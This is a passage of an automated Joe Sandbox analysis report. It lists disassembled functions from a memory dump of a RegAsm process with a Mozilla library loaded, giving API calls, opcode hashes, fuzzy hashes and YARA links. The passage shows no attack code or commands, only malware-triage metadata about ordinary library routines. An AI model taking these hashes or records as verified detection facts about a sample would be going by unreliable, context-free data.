                                                        • Opcode Fuzzy Hash: 79e7b85c3da8cdb2c6c546bd9491edbc3ed30ccc87e3590b0bc00bebb34a03be
                                                        • Instruction Fuzzy Hash: 2E318FB5A043159FC700CF24D884B9ABBE4BF89358F40842EEC5A97740EB34F919CB92
                                                        Function 6C11A2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • free.MOZGLUE(?), ref: 6C11A315
                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C11A31F
                                                        • free.MOZGLUE(00000000,?,?,?,?), ref: 6C11A36A
                                                          • Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
                                                          • Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
                                                          • Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2
                                                          • Part of subcall function 6C112140: free.MOZGLUE(?,00000060,?,6C117D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C11215D
                                                        • free.MOZGLUE(00000000), ref: 6C11A37C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                        • String ID:
                                                        • API String ID: 700533648-0
                                                        • Opcode ID: 7c38da5b8db8bd869b82c92be33b57f9193dbc58d9d4f0ff4baf7732d64bf118
                                                        • Instruction ID: 23b89269b9f2182c370381fe8630638058cc4ef4bae83ca39c85d63e26d41477
                                                        • Opcode Fuzzy Hash: 7c38da5b8db8bd869b82c92be33b57f9193dbc58d9d4f0ff4baf7732d64bf118
                                                        • Instruction Fuzzy Hash: 7B21F975A042249BCB01DF05D440B9FBBB9EF8A768F458065DD095BB00D739FD0AC6D1
                                                        Function 6C0FFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?), ref: 6C0FFFD3
                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?,?), ref: 6C0FFFF5
                                                        • free.MOZGLUE(?,?,?,?,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?), ref: 6C10001B
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?,?), ref: 6C10002A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                        • String ID:
                                                        • API String ID: 826125452-0
                                                        • Opcode ID: 57d7922d473a719d65bee1a397e18723549dbda6c1eefdaaf22af544b9647567
                                                        • Instruction ID: de58a6cd686696b32486d822d44ef85454425ab7228eb8a0ec73284a980cafa7
                                                        • Opcode Fuzzy Hash: 57d7922d473a719d65bee1a397e18723549dbda6c1eefdaaf22af544b9647567
                                                        • Instruction Fuzzy Hash: 14210872B002215FD7089E789C944AFB7FAEB853247254738E825D7780EA70AD4686D1
                                                        Function 6C127930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0DBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C127A3F), ref: 6C0DBF11
                                                          • Part of subcall function 6C0DBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C127A3F), ref: 6C0DBF5D
                                                          • Part of subcall function 6C0DBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C127A3F), ref: 6C0DBF7E
                                                        • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C127968
                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C12A264,6C12A264), ref: 6C12799A
                                                          • Part of subcall function 6C0D9830: free.MOZGLUE(?,?,?,6C127ABE), ref: 6C0D985B
                                                        • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C1279E0
                                                        • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C1279E8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                        • String ID:
                                                        • API String ID: 3421697164-0
                                                        • Opcode ID: c7747a20ce595dd6612dae9fc5e77ce3a4b6fcd4f73759d944328cff67897918
                                                        • Instruction ID: 40f0f836cd65a844e5833ae908aa37158400ec5e41e7df26d11b3a7d7b10e7ec
                                                        • Opcode Fuzzy Hash: c7747a20ce595dd6612dae9fc5e77ce3a4b6fcd4f73759d944328cff67897918
                                                        • Instruction Fuzzy Hash: 67218C357043149FCB14EF18D894A9EBBF5EF89318F00886CE84A87351CB30E909DB92
                                                        Function 6C127A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0DBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C127A3F), ref: 6C0DBF11
                                                          • Part of subcall function 6C0DBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C127A3F), ref: 6C0DBF5D
                                                          • Part of subcall function 6C0DBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C127A3F), ref: 6C0DBF7E
                                                        • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C127A48
                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C127A7A
                                                          • Part of subcall function 6C0D9830: free.MOZGLUE(?,?,?,6C127ABE), ref: 6C0D985B
                                                        • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C127AC0
                                                        • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C127AC8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                        • String ID:
                                                        • API String ID: 3421697164-0
                                                        • Opcode ID: 7cb933afe4d534c5128e1c4a59eef85dbeb8c95bda97924936d550b8d30504be
                                                        • Instruction ID: 1b6774712c94322b2905daaea631f59135a4e37c26422e8318435e6baf134b69
                                                        • Opcode Fuzzy Hash: 7cb933afe4d534c5128e1c4a59eef85dbeb8c95bda97924936d550b8d30504be
                                                        • Instruction Fuzzy Hash: 37214A757043149BCB14EF18D895A9EBBE5EF89318F01886CE84A87351CB30E909DB92
                                                        Function 6C12AAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C12AAF8
                                                        • EnterCriticalSection.KERNEL32(6C14F770,?,6C0EBF9F), ref: 6C12AB08
                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6C0EBF9F), ref: 6C12AB39
                                                        • LeaveCriticalSection.KERNEL32(6C14F770,?,?,?,?,?,?,?,?,6C0EBF9F), ref: 6C12AB6B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                        • String ID:
                                                        • API String ID: 1951318356-0
                                                        • Opcode ID: 4cb4966d352b3211224124ac97e925694ae2311ad8466a45554f29bc97e311bc
                                                        • Instruction ID: b546353a9576a27ad81a64b7d4cdba29b13fd69a7cb0ee9382477b38b17f11fb
                                                        • Opcode Fuzzy Hash: 4cb4966d352b3211224124ac97e925694ae2311ad8466a45554f29bc97e311bc
                                                        • Instruction Fuzzy Hash: 201158B5A002098FCF00DFA5D848D9F7BB5FF853197044429E90597301E738E549CBB1
                                                        Function 6C0DB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0DB4F5
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0DB502
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0DB542
                                                        • free.MOZGLUE(?), ref: 6C0DB578
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                        • String ID:
                                                        • API String ID: 2047719359-0
                                                        • Opcode ID: 6e47ac9ea1993fc0d9a6376a1742f4048630b08f441b714cabe899dc35fb4ca6
                                                        • Instruction ID: 453c2edadd1a8b7c435740d389c185bc38555be12fe205329b7b987c98739b43
                                                        • Opcode Fuzzy Hash: 6e47ac9ea1993fc0d9a6376a1742f4048630b08f441b714cabe899dc35fb4ca6
                                                        • Instruction Fuzzy Hash: FD11CA35A14B45CBD7129F29C804BA6B3F1FF9A328F55971AE84963B01EBB0B1C58790
                                                        Function 6C103DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C0CF20E,?), ref: 6C103DF5
                                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C0CF20E,00000000,?), ref: 6C103DFC
                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C103E06
                                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C103E0E
                                                          • Part of subcall function 6C0FCC00: GetCurrentProcess.KERNEL32(?,?,6C0C31A7), ref: 6C0FCC0D
                                                          • Part of subcall function 6C0FCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C0C31A7), ref: 6C0FCC16
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                        • String ID:
                                                        • API String ID: 2787204188-0
                                                        • Opcode ID: 88db6dac826d1b92370131c8d30f465b2e1a815925beaa676ade8c49a778a738
                                                        • Instruction ID: 44b73d710a1abb8bdf344be42087b309865b80ea2d74ce417160a9ec9739fc99
                                                        • Opcode Fuzzy Hash: 88db6dac826d1b92370131c8d30f465b2e1a815925beaa676ade8c49a778a738
                                                        • Instruction Fuzzy Hash: 7FF082B16002087BD700AB54DC41EAB376CEB46628F044020FE0C57741D635BD2996F7
                                                        Function 6C112050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11205B
                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C11201B,?,?,?,?,?,?,?,6C111F8F,?,?), ref: 6C112064
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11208E
                                                        • free.MOZGLUE(?,?,?,00000000,?,6C11201B,?,?,?,?,?,?,?,6C111F8F,?,?), ref: 6C1120A3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                        • String ID:
                                                        • API String ID: 2047719359-0
                                                        • Opcode ID: aa9f139c54446a9a6ffb0521933a024fc94c217f42831146f1c983c5511913c4
                                                        • Instruction ID: 47e662e4195a0b2b053d6a4d8ac286a7a065659a44353760449678244c7f1df6
                                                        • Opcode Fuzzy Hash: aa9f139c54446a9a6ffb0521933a024fc94c217f42831146f1c983c5511913c4
                                                        • Instruction Fuzzy Hash: B2F0B475204A009FC7119F16D888B5BB7F8EFCB328F10012AE50687B10D779E805CB95
                                                        Function 6C1120B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C1120B7
                                                        • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C0FFBD1), ref: 6C1120C0
                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C0FFBD1), ref: 6C1120DA
                                                        • free.MOZGLUE(00000000,?,6C0FFBD1), ref: 6C1120F1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                        • String ID:
                                                        • API String ID: 2047719359-0
                                                        • Opcode ID: 4fbe3aca069d19da43f91abe17b93f18e2f63bacea0c68bb3d4cd8b7ec75ed1e
                                                        • Instruction ID: b63f811fede688e4a936d270331473644d8f545b41f332eccb4e1aef56c939f8
                                                        • Opcode Fuzzy Hash: 4fbe3aca069d19da43f91abe17b93f18e2f63bacea0c68bb3d4cd8b7ec75ed1e
                                                        • Instruction Fuzzy Hash: A3E0E531604A248FC220AF259808A4EB7F9EFC7328B00063AE40683F00E77AF54686D5
                                                        Function 6C1185B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C1185D3
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C118725
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                        • String ID: map/set<T> too long
                                                        • API String ID: 3720097785-1285458680
                                                        • Opcode ID: 9ee960a8a22c25f2000e98b815ab42d60d2442e18b4882335a2f0169e7c51a5f
                                                        • Instruction ID: 06575d195ce9f1497997d1201eb2627c6a5694795f314a702686d58b00ba60a7
                                                        • Opcode Fuzzy Hash: 9ee960a8a22c25f2000e98b815ab42d60d2442e18b4882335a2f0169e7c51a5f
                                                        • Instruction Fuzzy Hash: 5E517974608651CFE701CF18C084B55BBF1BF5A318F1AC2AAD8595BB52C339E846CF91
                                                        Function 6C0CBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0CBDEB
                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0CBE8F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                        • String ID: 0
                                                        • API String ID: 2811501404-4108050209
                                                        • Opcode ID: 01154f9a31fef2773f8c5e7ed77bd79a00fe490e212e93684f909e5f3d1e99f3
                                                        • Instruction ID: 70a67fcca7d6b4b2f133cefd049ca2674abc4f64daa51a895801bec6a992e3d1
                                                        • Opcode Fuzzy Hash: 01154f9a31fef2773f8c5e7ed77bd79a00fe490e212e93684f909e5f3d1e99f3
                                                        • Instruction Fuzzy Hash: 2141AC71A09745CFC711DF38C481A9FBBE4AF8A348F008A1DF995A7611E731E9498B83
                                                        Function 6C0C9A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0C9B2C
                                                        • memcpy.VCRUNTIME140(6C0C99CF,00000000,?), ref: 6C0C9BB6
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0C9BF8
                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C0C9DE4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: d79a3b8207535333c6f5a14b0f649be1b920c4aeca52568cd84d7ea0eee6f824
                                                        • Instruction ID: e5a0f68e2a57e82d1cb87833b9f992cdcb50167ac2fdb6097c342cdf0e35da9b
                                                        • Opcode Fuzzy Hash: d79a3b8207535333c6f5a14b0f649be1b920c4aeca52568cd84d7ea0eee6f824
                                                        • Instruction Fuzzy Hash: D0D15A71B0021A9FCB14CF69C980BAEBBF2FF88318F184529E949A7740D771E955CB91
                                                        Function 6C110A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0D37F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C12145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C0D380A
                                                          • Part of subcall function 6C108DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C1206E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C108DCC
                                                          • Part of subcall function 6C110B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C11138F,?,?,?), ref: 6C110B80
                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C11138F,?,?,?), ref: 6C110B27
                                                        • free.MOZGLUE(?,?,?,?,?,6C11138F,?,?,?), ref: 6C110B3F
                                                        Strings
                                                        • baseprofiler::profiler_capture_backtrace, xrefs: 6C110AB5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                        • String ID: baseprofiler::profiler_capture_backtrace
                                                        • API String ID: 3592261714-147032715
                                                        • Opcode ID: f496938e6559eb8315230d111388a14e7ccfa3f7c73c4f6b42c19f14a2f3e356
                                                        • Instruction ID: 7d90fd88f1868f93f53302acbaee44b43a9c86e900764bad6bf2b99cf3710c26
                                                        • Opcode Fuzzy Hash: f496938e6559eb8315230d111388a14e7ccfa3f7c73c4f6b42c19f14a2f3e356
                                                        • Instruction Fuzzy Hash: AB21BF78F082459BDB04EF54D850BBEB3B9AF85308F14442DD815ABF40DB74AA55CBA1
                                                        Function 6C0CF180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • calloc.MOZGLUE(?,?), ref: 6C0CF19B
                                                          • Part of subcall function 6C0ED850: EnterCriticalSection.KERNEL32(?), ref: 6C0ED904
                                                          • Part of subcall function 6C0ED850: LeaveCriticalSection.KERNEL32(?), ref: 6C0ED971
                                                          • Part of subcall function 6C0ED850: memset.VCRUNTIME140(?,00000000,?), ref: 6C0ED97B
                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C0CF209
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                        • String ID: d
                                                        • API String ID: 3775194440-2564639436
